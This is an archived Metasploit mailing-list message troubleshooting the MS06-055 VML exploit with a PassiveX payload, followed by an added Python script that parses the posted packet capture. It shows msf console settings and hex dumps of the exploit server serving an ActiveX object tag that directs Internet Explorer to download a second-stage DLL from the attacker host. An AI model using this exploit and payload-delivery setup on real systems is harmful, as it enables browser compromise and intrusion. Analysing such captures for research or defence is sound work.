Metasploit mailing list archives
PassiveX-based payloads and MS06-055
From: buffer at softmedia.info (Angelo Dell'Aera)
Date: Fri, 16 Mar 2007 16:30:50 +0100
On Wed, 14 Mar 2007 23:03:41 -0700, mmiller at hick.org wrote:
> Hmm, from these logs it looks like it's working. 'p' is set to a proc that is defined in passivex.rb, which is correct. It looks like the text just line-wrapped. Since it says 'Sending PassiveX...', that means that it at least handled the initial request and sent it to the correct page which contains the object tag. However, it looks like the browser didn't attempt to download the control. Do you happen to be running this exploit in a non-administrative account? Internet Explorer won't download ActiveX controls as non-admin. Alternatively, can you try browsing to the page hosting PX in Internet Explorer, since it seems like you're getting farther now than before?
Matt, something is moving here, but we're still not at the end of the game. I noticed that the problem while handling the PXURI resource was not a real problem, but it's worth mentioning. While setting the environment variables, the handling is not done correctly if the / in the PXURI is not properly escaped (and my apologies for this).

msf exploit(ms06_055_vml_method) > set URIPATH uripath
URIPATH => uripath
msf exploit(ms06_055_vml_method) > set PXURI "/pxuri"
PXURI => /pxuri

Taking a step further, there's still no luck in owning the box. Take a look at this, please. This happens in the second stage of the exploit, when the client is trying to get PXURI.

The browser request...

0x0000: 4500 00f4 0177 4000 8006 3437 c0a8 2183 E....w@...47..!.
0x0010: c0a8 2182 042b 1f90 0553 dcd2 7073 2c77 ..!..+...S..ps,w
0x0020: 5018 faf0 1ebe 0000 4745 5420 2f70 7875 P.......GET./pxu
0x0030: 7269 2048 5454 502f 312e 310d 0a41 6363 ri.HTTP/1.1..Acc
0x0040: 6570 743a 202a 2f2a 0d0a 4163 6365 7074 ept:.*/*..Accept
0x0050: 2d4c 616e 6775 6167 653a 2069 740d 0a41 -Language:.it..A
0x0060: 6363 6570 742d 456e 636f 6469 6e67 3a20 ccept-Encoding:.
0x0070: 677a 6970 2c20 6465 666c 6174 650d 0a55 gzip,.deflate..U
0x0080: 7365 722d 4167 656e 743a 204d 6f7a 696c ser-Agent:.Mozil
0x0090: 6c61 2f34 2e30 2028 636f 6d70 6174 6962 la/4.0.(compatib
0x00a0: 6c65 3b20 4d53 4945 2036 2e30 3b20 5769 le;.MSIE.6.0;.Wi
0x00b0: 6e64 6f77 7320 4e54 2035 2e31 290d 0a48 ndows.NT.5.1)..H
0x00c0: 6f73 743a 2031 3932 2e31 3638 2e33 332e ost:.192.168.33.
0x00d0: 3133 303a 3830 3830 0d0a 436f 6e6e 6563 130:8080..Connec
0x00e0: 7469 6f6e 3a20 4b65 6570 2d41 6c69 7665 tion:.Keep-Alive
0x00f0: 0d0a 0d0a ....

and Metasploit response...

0x0000: 4500 01e2 71de 4000 4006 02e2 c0a8 2182 E...q.@.@.....!.
0x0010: c0a8 2183 1f90 042b 7073 2c77 0553 dd9e ..!....+ps,w.S..
0x0020: 5018 1920 3b57 0000 4854 5450 2f31 2e31 P...;W..HTTP/1.1
0x0030: 2032 3030 204f 4b0d 0a53 6572 7665 723a .200.OK..Server:
0x0040: 2041 7061 6368 650d 0a43 6f6e 7465 6e74 .Apache..Content
0x0050: 2d54 7970 653a 2074 6578 742f 6874 6d6c -Type:.text/html
0x0060: 0d0a 436f 6e74 656e 742d 4c65 6e67 7468 ..Content-Length
0x0070: 3a20 3333 370d 0a43 6f6e 6e65 6374 696f :.337..Connectio
0x0080: 6e3a 204b 6565 702d 416c 6976 650d 0a0d n:.Keep-Alive...
0x0090: 0a3c 6874 6d6c 3e09 3c6f 626a 6563 7420 .<html>.<object.
0x00a0: 636c 6173 7369 643d 2243 4c53 4944 3a42 classid="CLSID:B
0x00b0: 3341 4337 3330 372d 4645 4145 2d34 6534 3AC7307-FEAE-4e4
0x00c0: 332d 4232 4436 2d31 3631 4536 3841 4241 3-B2D6-161E68ABA
0x00d0: 3833 3822 2063 6f64 6562 6173 653d 222f 838 ".codebase="/
0x00e0: 7078 7572 692f 7061 7373 6976 6578 2e64 pxuri/passivex.d
0x00f0: 6c6c 232d 312c 2d31 2c2d 312c 2d31 223e ll#-1,-1,-1,-1">
0x0100: 0909 3c70 6172 616d 206e 616d 653d 2248 ..<param.name="H
0x0110: 7474 7048 6f73 7422 2076 616c 7565 3d22 ttpHost".value="
0x0120: 3139 322e 3136 382e 3333 2e31 3330 223e 192.168.33.130">
0x0130: 0909 3c70 6172 616d 206e 616d 653d 2248 ..<param.name="H
0x0140: 7474 7050 6f72 7422 2076 616c 7565 3d22 ttpPort".value="
0x0150: 3830 3830 223e 0909 3c70 6172 616d 206e 8080">..<param.n
0x0160: 616d 653d 2248 7474 7055 7269 4261 7365 ame="HttpUriBase
0x0170: 2220 7661 6c75 653d 222f 7078 7572 6922 ".value="/pxuri"
0x0180: 3e09 093c 7061 7261 6d20 6e61 6d65 3d22 >..<param.name="
0x0190: 4874 7470 5369 6422 2076 616c 7565 3d22 HttpSid".value="
0x01a0: 3222 3e09 093c 7061 7261 6d20 6e61 6d65 2">..<param.name
0x01b0: 3d22 446f 776e 6c6f 6164 5365 636f 6e64 ="DownloadSecond
0x01c0: 5374 6167 6522 2076 616c 7565 3d22 3122 Stage".value="1"
0x01d0: 3e09 3c2f 6f62 6a65 6374 3e3c 2f68 746d >.</object></htm
0x01e0: 6c3e l>

followed by a FIN/ACK, which is then ACKed by the browser. After this, nothing else.
Everything seems correct at first glance, but IE doesn't go on to download the ActiveX control. FYI, answering the question in your reply: I'm running this exploit as Administrator. I even tried disabling every kind of protection against ActiveX downloading and execution in every Internet zone, but still nothing.

Regards,

--
Angelo Dell'Aera 'buffer'
Antifork Research, Inc. http://buffer.antifork.org
Metro Olografix
PGP information in e-mail header
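When a capture like the one above is all you have, the useful first check is mechanical: rebuild the bytes from the hex dump, confirm the IP total length matches what was dumped, peel the IPv4/TCP headers, and verify that the HTTP reply is complete (status 200, Content-Length equal to the body actually on the wire) before blaming the browser. The script below is an added example, not code from the mail or from Metasploit; it embeds the Metasploit response dump exactly as posted (the only change is undoing the archive's " at " obfuscation of '@' in the ASCII column) and returns the <object> parameters the control would read.

```python
import re

# Metasploit's reply to the browser's "GET /pxuri", copied from the capture in
# the mail above (tcpdump -X style: offset, hex groups, ASCII column). Input is
# as posted except that the archive's " at " stands in again as a literal '@'.
PX_RESPONSE_DUMP = '''\
0x0000: 4500 01e2 71de 4000 4006 02e2 c0a8 2182 E...q.@.@.....!.
0x0010: c0a8 2183 1f90 042b 7073 2c77 0553 dd9e ..!....+ps,w.S..
0x0020: 5018 1920 3b57 0000 4854 5450 2f31 2e31 P...;W..HTTP/1.1
0x0030: 2032 3030 204f 4b0d 0a53 6572 7665 723a .200.OK..Server:
0x0040: 2041 7061 6368 650d 0a43 6f6e 7465 6e74 .Apache..Content
0x0050: 2d54 7970 653a 2074 6578 742f 6874 6d6c -Type:.text/html
0x0060: 0d0a 436f 6e74 656e 742d 4c65 6e67 7468 ..Content-Length
0x0070: 3a20 3333 370d 0a43 6f6e 6e65 6374 696f :.337..Connectio
0x0080: 6e3a 204b 6565 702d 416c 6976 650d 0a0d n:.Keep-Alive...
0x0090: 0a3c 6874 6d6c 3e09 3c6f 626a 6563 7420 .<html>.<object.
0x00a0: 636c 6173 7369 643d 2243 4c53 4944 3a42 classid="CLSID:B
0x00b0: 3341 4337 3330 372d 4645 4145 2d34 6534 3AC7307-FEAE-4e4
0x00c0: 332d 4232 4436 2d31 3631 4536 3841 4241 3-B2D6-161E68ABA
0x00d0: 3833 3822 2063 6f64 6562 6173 653d 222f 838 ".codebase="/
0x00e0: 7078 7572 692f 7061 7373 6976 6578 2e64 pxuri/passivex.d
0x00f0: 6c6c 232d 312c 2d31 2c2d 312c 2d31 223e ll#-1,-1,-1,-1">
0x0100: 0909 3c70 6172 616d 206e 616d 653d 2248 ..<param.name="H
0x0110: 7474 7048 6f73 7422 2076 616c 7565 3d22 ttpHost".value="
0x0120: 3139 322e 3136 382e 3333 2e31 3330 223e 192.168.33.130">
0x0130: 0909 3c70 6172 616d 206e 616d 653d 2248 ..<param.name="H
0x0140: 7474 7050 6f72 7422 2076 616c 7565 3d22 ttpPort".value="
0x0150: 3830 3830 223e 0909 3c70 6172 616d 206e 8080">..<param.n
0x0160: 616d 653d 2248 7474 7055 7269 4261 7365 ame="HttpUriBase
0x0170: 2220 7661 6c75 653d 222f 7078 7572 6922 ".value="/pxuri"
0x0180: 3e09 093c 7061 7261 6d20 6e61 6d65 3d22 >..<param.name="
0x0190: 4874 7470 5369 6422 2076 616c 7565 3d22 HttpSid".value="
0x01a0: 3222 3e09 093c 7061 7261 6d20 6e61 6d65 2">..<param.name
0x01b0: 3d22 446f 776e 6c6f 6164 5365 636f 6e64 ="DownloadSecond
0x01c0: 5374 6167 6522 2076 616c 7565 3d22 3122 Stage".value="1"
0x01d0: 3e09 3c2f 6f62 6a65 6374 3e3c 2f68 746d >.</object></htm
0x01e0: 6c3e l>
'''

HEX_TOKEN = re.compile(r"^[0-9a-f]{2}(?:[0-9a-f]{2})?$")


def parse_hexdump(dump: str) -> bytes:
    """Rebuild raw packet bytes from a tcpdump -X style dump. Hex tokens are
    read until 16 bytes or a non-hex token, so the ASCII column is never taken
    as data; each line's offset must equal the bytes collected so far, which
    catches a line lost or duplicated while the dump was pasted."""
    out = bytearray()
    for raw in dump.splitlines():
        m = re.match(r"^0x([0-9a-f]{4}):\s*(.*)$", raw.strip())
        if not m:
            continue  # blank line or caption, not a dump line
        if int(m.group(1), 16) != len(out):
            raise ValueError(f"offset 0x{m.group(1)} but {len(out)} bytes so far")
        nbytes = 0
        for tok in m.group(2).split():
            if nbytes >= 16 or not HEX_TOKEN.match(tok):
                break
            out += bytes.fromhex(tok)
            nbytes += len(tok) // 2
    return bytes(out)


def tcp_payload(packet: bytes) -> bytes:
    """Strip the IPv4 and TCP headers using the IHL and data-offset fields,
    after checking the IP total length against what was actually dumped."""
    if packet[0] >> 4 != 4 or packet[9] != 6:
        raise ValueError("expected an IPv4/TCP packet")
    ihl = (packet[0] & 0x0F) * 4
    total = int.from_bytes(packet[2:4], "big")
    if total != len(packet):
        raise ValueError(f"IP total length {total} but {len(packet)} bytes dumped")
    data_off = (packet[ihl + 12] >> 4) * 4
    return packet[ihl + data_off:]


def split_http(payload: bytes) -> tuple[str, dict[str, str], bytes]:
    """Split an HTTP message into status line, lower-cased header map and body."""
    head, _, body = payload.partition(b"\r\n\r\n")
    lines = head.decode("ascii").split("\r\n")
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def check_px_response(dump: str) -> dict[str, str]:
    """Verify the reply is a complete 200 whose Content-Length matches the body
    on the wire, then return the <param> values plus the codebase URL."""
    status, headers, body = split_http(tcp_payload(parse_hexdump(dump)))
    if not status.startswith("HTTP/1.1 200"):
        raise ValueError(f"unexpected status line: {status}")
    declared = int(headers["content-length"])
    if declared != len(body):
        raise ValueError(f"Content-Length {declared} but body is {len(body)} bytes")
    html = body.decode("ascii")
    params = dict(re.findall(r'<param name="([^"]+)" value="([^"]*)"', html))
    cb = re.search(r'codebase="([^"]+)"', html)
    params["codebase"] = cb.group(1) if cb else ""
    return params


if __name__ == "__main__":
    for name, value in check_px_response(PX_RESPONSE_DUMP).items():
        print(f"{name:20s} {value}")
```

For the posted capture this comes out clean: 482 bytes dumped, 442 bytes of TCP payload, a 105-byte header block and a 337-byte body that matches the declared Content-Length, with HttpHost, HttpPort, HttpUriBase, HttpSid and DownloadSecondStage all present. That rules out a truncated or miscounted reply and narrows the problem to the client side, which is exactly the direction the thread takes.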